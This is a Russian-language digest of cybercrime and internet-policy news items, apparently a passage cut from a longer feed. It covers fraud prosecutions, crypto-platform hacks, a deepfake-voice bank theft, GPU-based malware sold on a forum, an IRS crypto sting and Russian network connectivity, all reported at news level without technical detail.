Издание отмечает, что обвинения, связанные со сговором о банковском мошенничестве, предусматривают максимальное наказание в виде 30 лет тюремного заключения и штрафа в размере до миллиона долларов. Обвинение в мошенничестве с устройствами доступа может отправить каждого из обвиняемых в тюрьму еще на пять лет, бонусом послужит штраф до 250 тысяч долларов. Вынесение приговора Сарфо-Аду назначено на 28 ноября 2023 года, его подельники вину пока не признали.
source: shorenewsnetwork.com/2023/07/29/gloucester-county-man-pleads-guilty- to-bank-and-credit-card-fraud
Ущерб от деятельности крупнейшего в Беларуси криптообменника составил более Br9 млн. Об этом сообщили в Следственном комитете.
Главным следственным управлением завершено расследование уголовного дела в отношении троих уроженцев Лиды. Фигуранты умышленно содействовали уклонению от уплаты налогов в особо крупном размере Владиславу Кучинскому, который являлся владельцем нелегального криптообменника Bitok.me (ранее Bitok.by). На протяжении двух лет Кучинский и его представители осуществляли сделки по приобретению и отчуждению цифровых знаков (токенов), электронных денег за наличные и безналичные денежные средства. Кроме того, они обменивали токены одного вида на другой. В общей сложности фигуранты провели около 8 тыс. операций с токенами на общую сумму более $29 млн. В результате фигуранты, уклоняясь от уплаты налогов, причинили ущерб более Br9 млн.
При совершении преступления обвиняемые использовали средства анонимизации в сети, сим-карты, которые были зарегистрированы на подставных лиц и аккаунты на иностранных криптоплатформах. Это позволило им на протяжении долгого времени не привлекать к себе внимание сотрудников правоохранительных органов. При оперативном сопровождении Департамента финансовых расследований КГК, в результате проведенных следственных действий были установлены все участники совершенного преступления. Кроме того, были зафиксированы переговоры и встречи обвиняемых с клиентами онлайн-сервиса, а также факты передачи и получения наличных денежных средств.
Во время обысков у фигурантов изъяли компьютерную технику, носители информации и документацию, которая подтвердила причастность обвиняемых к совершению преступления. Также были изъяты более $280 тыс. Следователи допросили наиболее крупных клиентов онлайн-сервиса, которые осуществили обменные операции на сумму от Br50 тыс.
Следователи установили подконтрольные обвиняемым счета в банковских учреждениях Беларуси и Грузии, на которых находилось почти Br2 млн. На счета был наложен арест. При содействии Главного следственного управления Следственного комитета России по городу Москве, получена копия базы данных онлайн-сервиса, в ходе осмотра которой проанализированы сведения в отношении 2 000 клиентов. Деятельность данных клиентов продолжает исследоваться органом уголовного преследования. Во время расследования также было установлено, что онлайн-сервис использовался третьими лицами для совершения мошеннических действий и финансирования экстремистской деятельности. Виновные привлечены к ответственности.
После заключения под стражу соучастников преступления Владислав Кучинский, несмотря на уголовное преследование, продолжил осуществлять вышеуказанную деятельность посредством онлайн-сервиса Bitok.me. Он также оказал противодействие следствию, в том числе посредством принятия мер к выводу денег с подконтрольных счетов; направления клиентам сервиса электронных писем, в которых рекомендовал игнорировать вызовы в правоохранительные органы и придерживаться определенной им линии поведения при общении с сотрудниками.
В настоящее время владелец теневого криптообменника Владислав Кучинский объявлен в международный розыск. Ему инкриминируется совершение преступления, предусмотренного ч.3 ст.243 (уклонение от уплаты налогов в особо крупном размере) Уголовного кодекса Беларуси. Заочно к нему применена мера пресечения в виде заключения под стражу.
Действия пособников квалифицированы по ч.6 ст.16, ч.3 ст.243 (пособничество в уклонении от уплаты налогов в особо крупном размере) УК.
15 июня Microsoft прекратит поддержку Internet Explorer и уберет его из последних версий Windows 10.
15 июня компания Microsoft окончательно прекратит поддержку Internet Explorer в различных версиях Windows , спустя почти 27 лет после его запуска 24 августа 1995 года. Десктопная версия версия IE будет отключена и заменена на новый Microsoft Edge , при этом пользователи будут автоматически перенаправляться в Edge при запуске Internet Explorer 11.
Microsoft прекратит поддержку IE11 на определенных версиях Windows 10, поставляемых по полугодовому каналу на системы с клиентскими SKU Windows (версия 20H2 и более поздние) и Windows 10 IoT (версия 20H2 и более поздние).
Internet Explorer также недоступен в Windows 11, где по умолчанию используется Microsoft Edge на базе Chromium.
Однако, IE будет доступен на некоторых версиях Windows после 15 июня 2022 года:
Windows 7 ESU;
Windows 8.1;
Windows 10 LTSC client;
Windows 10 IoT;
Windows Server.
Согласно заявлению Microsoft, Internet Explorer 11 для поддерживаемых ОС будет получать обновления безопасности и техническую поддержку в течение жизненного цикла версии Windows, на которой он установлен. К тому же, в браузере Edge будет возможность выбрать режим IE11, поддерживающий обратную совместимость с оригинальным браузером. Этот режим будет поддерживаться до 2029 года.
source: docs.microsoft.com/en-us/lifecycle/products/internet-explorer-11
Заражению корпоративных сетей программой-вымогателем предшествует появление в них так называемого вредоноса-прекурсора.
Вымогательское ПО – одна из самых серьезных угроз безопасности предприятий, однако оно не берется из ниоткуда. По словам специалистов ИБ-стартапа Lumu Technologies, заражению корпоративных сетей программой-вымогателем предшествует появление в них так называемого вредоноса-прекурсора. Обычно это вредоносный код, использующийся для предварительного сбора всей необходимой информации. Он находится в сетях некоторое время и прокладывает путь для дальнейшего их заражения вредоносным ПО.
Теоретически, обнаружив и обезвредив этот вредоносный код, компании могут обезопасить себя от последующей атаки вымогателя. Если компания обнаружит, что ее сети связываются с чем-то похожим на C&C-серверы вредоносного ПО Emotet, Phorpiex, SmokeLoader, Dridex или TrickBot, ей следует незамедлительно отключить эту связь, в противном случае она может стать жертвой атаки кибервымгогателей.
В более чем 2 тыс. компаний, чьи сети мониторят специалисты Lumu, каждой атаке вымогательского ПО предшествует заражение другой вредоносной программой. Вредонос-прекурсор использует боковое перемещение для продвижения дальше по сети и устройствам, открывая доступ для будущего вымогательского ПО.
Команды безопасности могут заметить некоторую активность и решить, что их межсетевой экран или EDR-решение заблокировало вредоносную программу, и теперь все в порядке, но на самом деле это может быть всего лишь вредонос-прекурсор.
Этичные хакеры, обнаружившие уязвимости на государственных или частных веб- сайтах Ямайки, могут быть оштрафованы на 3 миллиона долларов и приговорены к трем годам тюремного заключения.
Власти Ямайки пересматривают закон о киберпреступлениях, принятый в 2015 году. Если положения закона останутся в силе и будут одобрены парламентом, этичные хакеры, обнаружившие уязвимости на государственных или частных веб-сайтах Ямайки, могут быть оштрафованы на 3 миллиона долларов и приговорены к трем годам тюремного заключения.
Например, под санкции может попасть Зак Уиттакер, редактор безопасности TechCrunch, который в феврале прошлого года сообщил о незащищенности сервера облачного хранилища с загруженными документами на веб-сайте JamCOVID.
Организация частного сектора Ямайки (PSOJ) рекомендовала Объединенному специальному комитету, работающему над новой редакцией Закона о киберпреступлениях, разработать структуру, обеспечивающую признание этических хакеров.
Данное предложение активно обсуждалось законодателями и технократами в четверг на заседании комитета.
Представители частного сектора выразили обеспокоенность, что невиновные исследователи, обнаружившие уязвимости и не имевшие злого умысла, могут быть подвергнуты санкциям в соответствии с законом.
Данную озабоченность также поддержал член комитета Джулиан Робинсон, выступивший против положений законодательства, криминализирующих этических хакеров.
«Я не уверен, что вы хотите криминализировать такое поведение, особенно когда люди стремятся помочь», — ответил Робинсон.
Джулиан Робинсон упомянул случай Уиттакера, онлайн-переписка которого указывала, что веб-сайт JamCOVID является легкой мишенью для злоумышленников.
По его словам, журналист TechCrunch был бы признан виновным в соответствии с пересматриваемым Законом о киберпреступлениях 2015 года.
«Я не знаю, хотите ли вы отговорить людей от такой работы, которая, честно говоря, делается во всем мире», — добавил он.
Робинсон также отметил, что при ограниченных местных ресурсах и внедрении Национальной системы идентификации в этом году правительство никогда не сможет найти внутренние ресурсы для надлежащей защиты своих сетей.
source: jamaica-gleaner.com/article/lead-stories/20220204/ethical-hackers- face-tough-sanction
В Департамент киберполиции обратилась медицинская компания, которая сообщила о том, что мошенники завладели деньгами, которые были предназначены для покупки медоборудования для обследования больных коронавирусом.
Как сообщила пресс-служба киберполиции, злоумышленники направили фишинговую ссылку партнерам потерпевшей компании и с помощью фишинга получили данные для входа в электронную почту.
Далее они подделали платежное поручение, которое рассылали со сломанного электронного ящика партнеров из КНР. Поэтому украинская медицинская компания перечислила деньги на счет мошенников, открытый в Великобритании. Таким образом фигуранты пытались присвоить более 723 тысяч долларов.
Сотрудники киберполиции совместно со следователями полиции Киева и правоохранителями Великобритании заблокировали деньги, похищенные со счета компании.
По данному факту возбуждено уголовное производство по ч. 3 ст. 190 (мошенничество) УК Украины. Злоумышленникам может грозить до восьми лет лишения свободы.
Используя дипфейк-голос, злоумышленники обманули сотрудника банка, убедив его
отправить им деньги.
Преступники ограбили банк в ОАЭ на сумму в $35 млн, подделав голос с помощью технологий искусственного интеллекта. Используя дипфейк-голос, злоумышленники обманули сотрудника банка, убедив его отправить им деньги. Сам сотрудник был уверен, что переводит средства в рамках легитимной бизнес-транзакции.
Как сообщается в [судебных документах](https://www.documentcloud.org/documents/21085009-hackers-use-deep- voice-tech-in-400k-theft) по данному делу, инцидент произошел в январе 2020 года, когда руководитель одного из отделений банка в ОАЭ (название банка не раскрывается) ответил на, казалось бы, обычный телефонный звонок. Звонивший назвался директором крупной компании, с которым руководитель отделения банка разговаривал раньше. Мужчина ничего не заподозрил, поскольку голос "директора" ничем не отличался от настоящего. Для большей убедительности злоумышленники отправили ему электронные письма от лица компании, с "директором" которой якобы разговаривал банкир, и ее юриста.
Мошенники убедили сотрудника в том, что компания вот-вот заключит крупную сделку на $35 млн, и он последовал их указаниям, начав переводить средства на "новые" счета мнимой компании.
Как показало следствие, мошенники использовали голосовой дипфейк или так называемый "дипвойс", чтобы подделать голос директора компании. В общей сложности в мошеннической схеме участвовали 17 человек, а похищенные деньги были переведены на множество банковских счетов по всему миру.
Данный случай является уже вторым известным случаем использования дипвойса для похищения средств. В 2019 году британская электроэнергетическая компания попала в такую же ситуацию. Мошенникам удалось похитить со счетов компании $€220 тыс., выдав себя за ее гендиректора.
source: documentcloud.org/documents/21085009-hackers-use-deep-voice-tech- in-400k-theft
Издание Bleeping Computer обнаружило, что в продаже на хакерском форуме появился эксплоит, который использует буфер памяти графического процессора для хранения вредоносного кода и его выполнения. В целом данный метод не нов и подобные PoC-эксплоиты уже публиковались ранее, однако все эти проекты либо были реализованы в рамках академических исследований, либо оставались неполными и необработанными.
Продавец эксплоита пишет, что его инструмент успешно защищает вредоносный код от защитных решений, сканирующих системную оперативную память. Пока он работает только в Windows-системах, которые поддерживают OpenCL 2.0 и выше. Автор эксплоита уверяет, что его решение проверено и точно работает на видеокартах Intel (UHD 620/630), Radeon (RX 5700) и GeForce (GTX 740M, GTX 1650).
Объявление появилось на хак-форуме 8 августа текущего года, а примерно через две недели, 25 августа, продавец сообщил, что продал свой PoC, но не раскрыл никаких подробностей о совершенной сделке.
Исследователи VX-Underground пишут в Twitter, что проданный вредоносный код действительно работает и позволяет графическому процессору выполнять бинарники. Они пообещали, что продемонстрируют эту технику атак в ближайшее время.
__https://twitter.com/x/status/1432045849429823488
Журналисты Bleeping Computer напоминают, что малварь для GPU уже создавалась, имея в виду руткит JellyFish и кейлоггер Demon. Эти проекты были опубликованы в мае 2015 года и по-прежнему находятся в открытом доступе. Фундамент для подобных атак и вовсе был заложен в 2013 году исследователями из Института компьютерных наук, FORTH и Колумбийского университета в Нью-Йорке. Они демонстрировали, что работу кейлоггера можно возложить на графические процессоры и те будут сохранять перехваченные нажатия клавиш в своей памяти.
Продавец нового инструмента утверждает, что его разработка никак не связана с JellyFish и говорит, что его метод отличается от представленного в 2015 году, так как не полагается на маппинг кода обратно в пользовательское пространство.
Президент Украины Владимир Зеленский утверждает, что украинские специалисты
доложили ему о "большой вероятности" того, что масштабная хакерская атака на
ряд правительственных сайтов неделю назад осуществлялась из России.
"Наши специалисты мне сказали, что есть очень большая вероятность, что
[недавняя] кибератака происходит из России", - заявил Зеленский в интервью.
При этом он предположил, что хакерских атак следует ожидать и в будущем, однако отметил, что это не самая большая угроза для Украины. "Это не первая и не последняя кибератака. Если сравнивать, какая война более опасна - кибер или обычная война, мне трудно сказать. Я считаю, что ракетные обстрелы и авиационные удары гораздо более угрожающие. Последствия войны более тяжелые, чем последствия кибератаки", - сказал украинский президент.
По его словам, сейчас в отношении Украины осуществляются различного типа нападения. "У нас есть гибридная война. Нас атакуют: военные атаки, кибератаки и энергетические атаки", - перечислил Зеленский. В то же время он уверен, что Украина поддерживается западными партнерами, среди которых выделил США. "Не раскрывая деталей, Владимир Зеленский констатировал, что военная поддержка со стороны администрации президента США Джо Байдена сейчас сильнее, чем была раньше", - сообщил офис украинского лидера.
Служба безопасности Украины (СБУ) сообщила 14 января, что расследует масштабную хакерскую атаку на ряд правительственных сайтов, в том числе МИД и Минобразования. Временно было недоступно также приложение госуслуг "Дия". В СБУ утверждали, что на главной странице взломанных сайтов хакеры разместили сообщения провокационного характера, при этом содержание сайтов изменено не было, а утечки персональных данных, по предварительной информации, не произошло. Секретарь Совета национальной безопасности и обороны Украины Алексей Данилов выступил с утверждением о причастности России к этой кибератаке. Пресс-секретарь президента РФ Дмитрий Песков в интервью американскому телеканалу CNN сообщил, что Россия никакого отношения к хакерским атакам на украинские правительственные сайты не имеет.
Агенты Налогового управления США (IRS) выдавали себя за криптовалютного трейдера под незамысловатым ником Mr.Coins, чтобы выследить торговцев запрещенными веществами в дарквебе.
Секретные операции давно не новость для IRS. Однако, этот случай стал первым, когда агенты организации разоблачают преступников под “маской” торговца криптовалютами. К радости всех, кто по-прежнему верит телевидению, псевдоанонимность криптоиндустрии все же привлекает многих злоумышленников, отмывающих денежные средства, наркоторговцев и других постояльцев самых отдаленных уголков интернета. Согласно аналитикам Chainalysis, только за 2020 год оборот незаконных организаций превысил 5 миллиардов долларов.
Чтобы обратить внимание злоумышленников на свой аккаунт в сервисе LocalCryptos, IRS разместили рекламу о продаже биткоинов более года назад в июне 2020-го. Тогда Mr.Coins предложил всем желающим купить у него BTC наличными по цене, превышающей среднерыночную при помощи почтовой службы. Для продажи агенты организации призвали потенциальных покупателей воспользоваться зашифрованной службой Wickr, либо WhatsApp с целью отвести от себя лишние подозрения.
Вскоре на связь вышел предполагаемый наркоторговец Чейз Хит из Эвансвилла, Индиана, тогда известный IRS, как некто под ником Lucifallen21. Естественно, о передаче всей суммы сделки наличными в размере 180 000 долларов одним платежом не шло и речи. Торговец мог заподозрить неладное. Потому было принято решение провести продажу частями.
Сначала покупатель решил приобрести небольшую сумму биткоинов около 1,59 BTC за 15 040 долларов по курсу на тот момент, предварительно завернув наличные в одежду и отправив почтой. Спустя месяц он приобрел еще 1,34 BTC и 45,2 XMR на сумму 20 000 долларов, а чуть позже совершил дополнительные покупки на общую сумму более 65 000 долларов.
Лишь весной 2021 года, когда IRS окончательно подготовилась к финалу спецоперации, посылка с наличными на сумму 28 000 долларов отправленная наркоторговцем почтовой службой, была перехвачена. Агенты сообщили Lucifallen21 о том, что не получили денежных средств от него, а почта сослалась на утерю посылки. Когда злоумышленник решил позвонить, выяснив детали, представители IRS наконец узнали его контактный номер, отследив остальные личные данные. Вместе с последней посылкой специалистам из IRS также удалось получить отпечатки Хайта, подтвердив ранние подозрения при помощи датабазы. Служба предъявила обвинения в суде Восточного округа Нью-Йорка еще в июле 2021 года. Теперь впереди у нее судебное разбирательство, хотя сам продавец запрещенных веществ пока не подавал заявления о признании вины.
Ранее IRS уже выдавала себя за наркоторговца, пытаясь узнать данные руководителей анонимайзера криптотранзакций Bitcoin Fog, а также притворялась торговцем поддельными вещами от Gucci в попытке выйти на оператора, обменивавшего наличные на биткоины.
Забавно, что профиль Mr.Coins получил 100% положительных отзывов и до сих пор доступен на LocalCryptos. Но если вы злоумышленник, то, пожалуй, стоит воздержаться от его деловых предложений.
DeFi-платформа Bzx признала потерю $55 млн средств пользователей в среду на прошлой неделе. Разработчики подчеркивают тот факт, что они стали жертвой фишинговой атаки хакеров, код смарт-контракта не имел никаких багов.
Злоумышленники послали электронное письмо с вордовским файлом, содержащим зараженный макрос, который стал причиной потери seed-фраз и закрытых ключей из компьютера одного из членов команды Bzx.
На основе полученной дополнительной информации, хакеры составили письмо таким образом, чтобы разработчик обязательно открыл его и запустил вредоносный код. Полученные ключи дали злоумышленникам доступ к управлению смарт-контрактов на блокчейне Binance Smart Chain и сети Polygon.
Атака не затронула пулы на Ethereum, управляемые с помощью DAO. Разработчики
не успели включить туда смарт-контракты на блокчейне Binance Smart Chain и
сети Polygon.
Получив ключи, хакеры сначала опустошили кошельки члена команды, потом
приступили к выводу криптовалюты из пулов ликвидности. Они истощались путем
займов под служебный токен BZRX.
Разработчики подключились к отражению атаки после получения информации про отрицательные балансы на счетах ряда пользователей. Основателям Bzx удалось добиться блокировки активов в USDT и BZRX на блокчейне Binance Smart Chain. В настоящее время проводится аудит точной суммы убыток с целью ее последующей компенсации.
За последние два года Россия потеряла второе место в мире по количеству так называемых номеров автономных систем (autonomous system number, ASN), от которых зависит устойчивость интернет-пространства, рассказал РБК Максим Буртиков, директор по внешним связям RIPE NCC в Восточной Европе и Центральной Азии. RIPE NCC — одна из пяти интернет-регистратур в мире, которая занимается распределением в России, Европе и на Ближнем Востоке IP-адресов (уникальных идентификаторов, состоящих из нескольких цифр, которые нужны каждому устройству для выхода в интернет) и ASN.
Речь идет о номерах, которые выделяются, например, интернет-провайдерам, банкам или технологическим компаниям для обмена данными с другими сетями в интернете без посредников. «Если представить паутину, то перекрестки на ней — номера автономных систем, — объясняет Буртиков. — Это отдельные сети какого- нибудь «Ромашка-телеком», «Яндекса» и т.д. Если перекрестков становится меньше, значит, добраться из точки «А» в точку «Б» можно меньшим количеством путей и маршрутов. Когда исчезают из Глобальной сети номера автономных систем, это вредит общей связности в интернете».
По данным RIPE NCC, максимальное количество номеров — около 6,3 тыс. — в России было весной 2020-го. Сейчас этот показатель снизился на 5%. При этом США сохранили первое место по числу номеров автономных систем, а на второе место вышла Бразилия, где наблюдался рост числа подобных систем (отдельных данных по лидерам Буртиков не раскрывает).
Как количество номеров влияет на устойчивость Рунета и насколько это критично, разбирался РБК.
Почему стало меньше номеров
«Мы не спрашиваем у компаний, почему они их возвращают [номера]», — говорит Буртиков. Он отметил, что крупных компаний-«отказников» пока нет, в основном номера возвращают представители небольшого бизнеса, которые могут получать услуги через другого оператора и просто перестать быть независимой единицей в сети.
По одной из версий, которую РБК рассказал представитель компании, который намерен вернуть RIPE NCC номер, число владельцев номеров стало сокращаться в России через несколько месяцев после вступления в силу в ноябре 2019-го так называемого закона о суверенном Рунете. Закон обязывает операторов связи и владельцев ASN устанавливать на своих сетях специальное оборудование Роскомнадзора, через которое ведомство сможет управлять маршрутизацией трафика в случае угрозы извне, а также будет блокировать доступ к запрещенным в России сайтам.
По словам собеседника РБК, поскольку это оборудование не сертифицировано и представляет собой «черный ящик», компания опасается за безопасность своей сети и предпочтет отказ от использования номера автономной системы, чем установку указанных технических средств. Но для бизнеса это не несет явных негативных последствий, так как компания может работать через оператора, имеющего подобный номер, объясняет собеседник РБК.
«Есть факт вступления в силу закона («о суверенном Рунете». — РБК) и последствия: автономных систем стало в использовании меньше», — прокомментировал это утверждение Максим Буртиков.
Есть ли угроза устойчивости Рунета
Российские власти изначально объясняли необходимость принятия закона «о суверенном Рунете» потенциальной угрозой отключения России от интернета. Установленное Роскомнадзором оборудование пока, исходя из официальных сообщений службы, использовалось лишь однажды: весной этого года с его помощью власти замедляли скорость доступа к Twitter из-за отказа последней удалять запрещенный в России контент.
Как объясняет Александр Хакимов, технический директор хостинг-провайдера
REG.RU, связность влияет на устойчивость и скорость интернета, а также на
быстрый и беспрепятственный обмен информацией и данными. Он согласен, что из-
за «возросшей активности» Роскомнадзора по вопросам устойчивости Рунета
активизировался возврат номеров автономных систем, но считает, что это не
должно повлиять на связность Рунета. «Возвращаются те автономные системы,
которые не использовались в хозяйственной деятельности организаций. Интернет-
провайдеры и операторы связи (а именно их системы больше всего влияют на
связность) не закрываются, и их автономные системы продолжают работать», —
объяснил Хакимов.
Несмотря на сокращение числа ASN, Максим Буртиков оценивает возможность
крупных инцидентов в российском сегменте интернета как «минимальную»: «Если
вдруг что-то окажется недоступно извне, то интернет в стране будет работать
нормально, потому что большинство контента находится на серверах внутри страны
за счет CDN (content delivery network — географически распределенная сетевая
инфраструктура, позволяющая оптимизировать доставку и дистрибуцию контента для
конечных пользователей интернета. — РБК) и инфраструктуры, которую строят веб-
сервисы. За счет сверхсвязности — в России огромное количество внешних
подключений к зарубежным сетям — риски снижаются». В то же время он
оговорился, что «нулевой риск невозможен».
В Роскомнадзоре на момент публикации не ответили на запрос РБК.
От чего еще зависит развитие Рунета
Ранее RIPE NCC предупреждала, что IP-адреса в IPv4 — наиболее распространенной
версии используемого для передачи данных в интернете протокола IP — близки к
завершению, и призывала компании переходить на следующую версию протокола —
IPv6. Однако на данный момент в России всего 9,38% трафика идет по IPv6,
оценивает Google. Лидером по этому показателю является Индия (63,92%). При
этом в США в мобильном трафике доля IPv6 много лет назад превышала 80%, а в
ноябре 2020 года эта страна приняла государственную программу развития IPv6
(правительство обещает полностью перейти только на новый протокол в ближайшие
годы), что должно демонстрировать пример частным компаниям, отметил Максим
Буртиков. Китай, по его словам, планирует в 2030 году завершить полный переход
на IPv6 как в коммерческих сетях, так и в госсекторе.
В России единственный оператор, который полностью перешел на IPv6, по словам
Буртикова, — это МТС. «Звучали истории о том, что пользовательское
оборудование не готово к работе по IPv6, но это в основном не так с мобильными
устройствами. Может быть, домашний роутер не способен работать по IPv6, если
он был куплен в 1995 году и с тех пор не менялся. Но многие операторы в
крупных городах уже предоставляют пользователям свое оборудование. Оно, скорее
всего, готово к IPv6», — говорит представитель RIPE NCC. Он подчеркнул, что
хотя для конечных пользователей нет никакой разницы, использовать IPv4 или
IPv6, при развитии технологии мобильной связи следующего, пятого поколения
(5G), а также интернета вещей инфраструктуры IPv4 не хватит. «IPv4 служит
бутылочным горлышком для инноваций, которые могут случиться. Многие говорят,
что, пока они не случились, нам не нужно ничего делать, но в момент, когда
нужно будет делать, ваш старт будет сильно отложен по сравнению со стартом
того, у кого инфраструктура уже готова. Это не здорово, в эту гонку надо
включаться уже по полной», — резюмировал Буртиков.
Представитель МТС подтвердил, что мобильной сети оператор полностью завершил
внедрение IPv6 в начале 2020 года, сейчас доля такого трафика достигает около
40% и продолжает расти. «Компания существенно экономит насчет отказа от
необходимости приобретения пула адресов IPv4», — добавил он. По словам
представителя «ВымпелКома» (бренд «Билайн»), компания рассчитывает, что в
скором времени все ее оборудование будет поддерживать IPv6.
Однако представитель «МегаФона» сообщил, что компания не планирует полностью
переходить на IPv6, так как еще не все сервисы в интернете поддерживают этот
протокол. Это значит, что в противном случае пользователи могут лишиться
доступа ко множеству интернет-ресурсов.
В «Ростелекоме» сказали, что компания «располагает достаточно большим ресурсом IPv4-адресов, поэтому отказываться от него пока нет смысла», но она планирует развивать IPv6 в связи с ростом спроса на интернет вещей.
«Мы живем в гибридном мире»
Максим Буртиков рассказал РБК, как масштабный сбой в работе сервисов Meta (до недавнего времени Facebook Inc.) и ее новая концепция «метавселенной» повлияет на весь интернет.
— В начале октября Facebook, Instagram и WhatsApp прекратили работу на несколько часов из-за масштабного технического сбоя. Что он показал?
— Это был сетевой инцидент. Facebook провел работу над ошибками и выпустил достаточно хороший post-mortem (в программировании статья, написанная после какой-то крупной ошибки или провала. — РБК). По большому счету это и требуется от инцидента. Ценность инцидента и способа его отработки заключается в возможности научиться, чтобы подобные вещи не происходили. Никто больше, чем сам Facebook, не хочет, чтобы их сервисы были максимально доступны. Мы можем сколько угодно говорить о том, что у нас в этот момент была какая-то неполученная прибыль: может быть, кто-то что-то продавал через свою страничку в Instagram; кто-то не смог с кем-то встретиться, потому что не работал WhatsApp. Но для Facebook это в целом миллионные или миллиардные потери.
— Facebook Inc. объявила о переименовании в Meta в честь Metaverse — продукта, на который теперь намерена делать ставку компания. Это должна быть метавселенная, где пользователи смогут общаться в виртуальной реальности. Какие перспективы у подобной концепции? Что изменится в интернете с переходом компаний в виртуальную реальность?
— Эту концепцию придумал не Facebook, они просто сделали ее своим бизнес- фокусом на ближайшее время. Я очень позитивно отношусь к подобным вещам. Считаю, что технологии и их развитие — это скорее плюс. Любая технология таит в себе риски, и мы будем наталкиваться на какие-то проблемы. Если у тебя нет собаки, ее не отравит сосед, но это не повод не заводить собаку. Примерно такой логики придерживаюсь по отношению к развитию технологий и метавселенной в том числе. Что касается конкретно продукта, над которым работает Facebook, то, на мой взгляд, это не совсем то, что можно было бы назвать метавселенной. Он будет некой виртуальной вселенной Facebook, будет работать по его правилам с единым центром принятия решений и т.д., в то время как настоящая метавселенная, как она изначально задумывалась в умах визионеров, похожа на интернет, это открытая платформа, на которой каждый, используя ее технические свойства, способен построить нечто свое. Пока похоже, что Facebook строит свою виртуальную песочницу, она может иметь успех среди пользователей, но это не совсем метавселенная.
— По вашему мнению, возможно ли появление в ближайшее время метавселенной в том смысле, который в нее вкладывали фантасты?
— Это как люди в 70-х или 80-х годах прошлого века пытались бы спрогнозировать, когда появится интернет. Когда сформируется весь цифровой слой поверх реального мира (а метавселенная именно это и есть), в какой момент существующие множества цифровых песочниц соединятся в метавселенную, сказать сложно. Думаю, мы не сможем выделить момент, когда бутылка шампанского разобьется о корму метавселенной. Просто в какой-то момент поймем, что «окей, вот это уже что-то похожее», и осознаем это ретроспективно, глядя в прошлое. К самой идее я отношусь с большим позитивом, здесь кроется колоссальная польза для меня как для человека, но и колоссальные риски в том числе. И уже сейчас наша цифровая жизнь имеет огромную и все возрастающую роль и ценность для нас, так что мы уже можем сказать, что живем в гибридном мире.
Источник:
](https://www.rbc.ru/technology_and_media/25/11/2021/619655959a7947c599e5c9e6?from=newsfeed)
Международная организация RIPE NCC зафиксировала снижение связности Рунета — числа маршрутов для обмена данными между владельцами разных сетей. Но возможность инцидентов в российском сегменте интернета по-прежнему минимальна
www.rbc.ru
Криптовалютная платформа Grim Finance, запущенная на базе Fantom Opera, сообщила 19 декабря в Twitter, что подверглась хакерской атаке. В результате с платформы были похищены криптовалюты более чем на $30 миллионов. Оператор не предоставил более подробной информации о том, какие токены и в каких объемах была выведена с платформы.
Хакеры получили доступ к кошельку платформы через функцию beforeDeposit(), используя вредоносный токен-контракт. Эксплойт был обнаружен в контракте криптовалютного кошелька. Поэтому Grim Finance приостановила прием депозитов на кошельки, чтобы защитить деньги пользователей от потенциального риска вывода злоумышленниками.
Разработчики попросили пользователей оперативно вывести активы с платформы, поскольку все кошельки скомпрометированы и деньги находятся под угрозой хакерской атаки. Оператор сообщила Circle (USDC), DAI и AnySwap адрес злоумышленника, чтобы они заблокировали дальнейшие незаконные переводы токенов с платформы.
Проект поблагодарил компании, такие как Beefy, Tomb, SpiritSwap и FTM Alerts, которые предоставили ей информацию о кибератаке. Grim Finance не сообщила об обращении в правоохранительные органы или действиях, направленных на выявление злоумышленников. Компания предупредила пользователей, что вся информация по расследованию инцидента и возобновлению работы платформы будет позднее размещена на официальном ресурсе Grim Finance.
На этой неделе игровой сервис Vulcan Forged в результате хакерской атаки потерял около $100 миллионов. В начале декабря хакеры похитили более $150 миллионов в криптовалютах с биржи Bitmart.
Недавно аналитики Crystal Blockchain Research подготовили отчет о взломах и мошенничестве в криптовалютной индустрии за период с 2011 по 2021 год. По итогам десятилетия общий эквивалент украденных хакерами криптовалют превысил $12.1 миллиарда.
Facebook* создал масштабную сеть слежки за пользователями
В новом [исследовании ](https://xss.is/(https%3A//www.consumerreports.org/electronics/privacy/each- facebook-user-is-monitored-by-thousands-of-companies-a5824207467/))Consumer Reports сообщается следующее: используя группу из 709 добровольцев, имеющих аккаунты в Facebook, было обнаружено что в общей сложности 186 892 организации получили их пользовательские данные в течение 3 лет.
В среднем каждый участник исследования отправил свои данные 2 230 компаниям на платформе FB. В некоторых случаях, участник мог отправить данные о себе 7000 компаниям благодаря продуманной "политике конфиденциальности" компании Facebook.
Компаниям не интересно то, как вы используете Facebook*. Им интересно понять, как пользователь [взаимодействует ](https://www.schneier.com/blog/archives/2024/02/facebooks-extensive- surveillance-network.html)с другими компаниями.
Пользователи возмущаются такими действиями и говорят о необходимости прекратить слежку. Вокруг компании Meta* разгораются и другие скандалы в настоящий момент. Так бывший генеральный прокурор Нью-Мексико [назвал ](https://xss.is/(https%3A//www.theguardian.com/global- development/2024/jan/31/meta-worlds-single-largest-marketplace-for- paedophiles-new-mexico-attorney-general-facebook-instagram))Meta* "крупнейшим в мире рынком для педофилов". Согласно данным прокуратуры, около 100 000 детей на платформах Facebook* и Instagram* ежедневно подвергаются сексуальным домогательствам в сети.
UPD: *Деятельность Meta (соцсети Facebook, Instagram, Threads) запрещена в России как экстремистская.
Продажа реквизитов, предоставляющих доступ к счетам либо электронным кошелькам, иным платежным средствам влечет уголовную ответственность.
За 2022 год следователями Гродненской области по статье 222 (незаконный оборот средств платежа и (или) инструментов) Уголовного кодекса Республики Беларусь возбуждено 4 уголовных дела, с начала текущего года уже 35 уголовных дел. При этом почти в 90% дел возраст подозреваемых от 16 до 21 года. Данный рост вызывает обеспокоенность, так как в погоне за легкими деньгами молодые люди нередко прибегают к незаконным способам обогащения. Школьники, учащиеся, студенты становятся марионетками в руках злоумышленников, которые, обещая заработать деньги, подталкивают их на совершение преступлений.
В подобную ситуацию попал и 18-летний житель Гродно. Гродненским межрайонным отделом Следственного комитета в отношении парня возбуждено уголовное дело за незаконный оборот средств платежа.
По данным следствия, молодой человек в феврале 2022 года, на тот момент ему было 17 лет, в одном из мессенджеров нашел сообщение о подработке. В тот же день он связался с пользователем, который предложил зарегистрировать аккаунт для входа в одно из мобильных приложений банка. Подозреваемого ничего не смутило, а желание заработать легкие деньги только подтолкнуло к этому. После успешной регистрации подросток сообщил реквизиты пользователю, за что получил незначительную сумму. В ноябре 2022 года молодой человек по просьбе товарища зарегистрировал на свое имя аккаунт в другом банковском приложении, а реквизиты передал последнему, за что также получил вознаграждение.
